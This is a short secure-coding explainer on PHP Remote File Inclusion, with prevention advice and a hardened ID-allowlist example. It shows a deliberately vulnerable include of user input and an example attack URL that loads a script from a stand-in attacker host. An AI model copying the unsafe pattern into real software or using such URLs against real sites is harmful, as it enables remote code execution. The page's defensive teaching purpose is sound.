Remote File Inclusion (RFI)
Description
LFI (Local File Inclusion) and RFI (Remote File Inclusion) are very similar; the only difference is that RFI allows the inclusion and execution of files fetched from a remote server.
RFI is more critical than LFI, because the attacker can execute code hosted on a server they control.
For example, http://site.com/?file=news.php
This is implemented in PHP on the server as:
$file = $_GET['file']; // attacker-controlled value, used without any validation
include($file);
This implementation is unsafe because it does not validate the user's input.
An attacker can then supply a different file, including one hosted on a remote server, which gets executed by the server:
http://site.com/?file=http://attacker.com/malicious.php
Impact
- If the web-server process runs with a privileged account, the whole server can be compromised.
- Remote code execution (RCE) is possible.
Prevention
- If you do not need to include executable files from a remote server, disable the remote inclusion feature in the server configuration (the allow_url_include directive in PHP).
- By default, it is disabled in the PHP configuration file (php.ini).
- Never trust user input: always validate or filter it before passing it to any further function.
- Instead of putting a file path in the URL, store the path in a database with a numeric ID assigned to it, and use that ID in the URL.
- Prefer an allowlist (whitelist) of the files that may be included.
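The following is an added example, not code from the original page: the unsafe include shown above placed next to a hardened version that combines the numeric-ID and allowlist advice. The page names (news.php, about.php, contact.php) and the pages/ directory are assumptions for illustration.

```php
<?php
// Added example (not from the original page): the unsafe include next to a
// hardened version that maps a numeric ID to an allowlisted file.
// The file names and the pages/ directory are assumed for illustration.

// UNSAFE: whatever the client sends is included, including a remote URL
// when allow_url_include is enabled in php.ini.
function includeUnsafe(): void
{
    $file = $_GET['file'];
    include($file);
}

// SAFE: the client only chooses an ID; the server decides the path.
const PAGES = [
    1 => 'news.php',
    2 => 'about.php',
    3 => 'contact.php',
];

function resolvePage(string $id): ?string
{
    // Accept only a plain decimal integer; reject anything else outright.
    if (!ctype_digit($id)) {
        return null;
    }
    $key = (int) $id;
    if (!array_key_exists($key, PAGES)) {
        return null;
    }
    // Resolve against a fixed base directory and verify the final path
    // still lies inside it (defence in depth against a bad allowlist entry).
    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . PAGES[$key]);
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function includeSafe(): void
{
    $path = resolvePage($_GET['id'] ?? '');
    if ($path === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $path;
}
```

With this structure a request such as ?id=2 includes pages/about.php, while ?id=http://attacker.com/malicious.php fails the ctype_digit check and never reaches include.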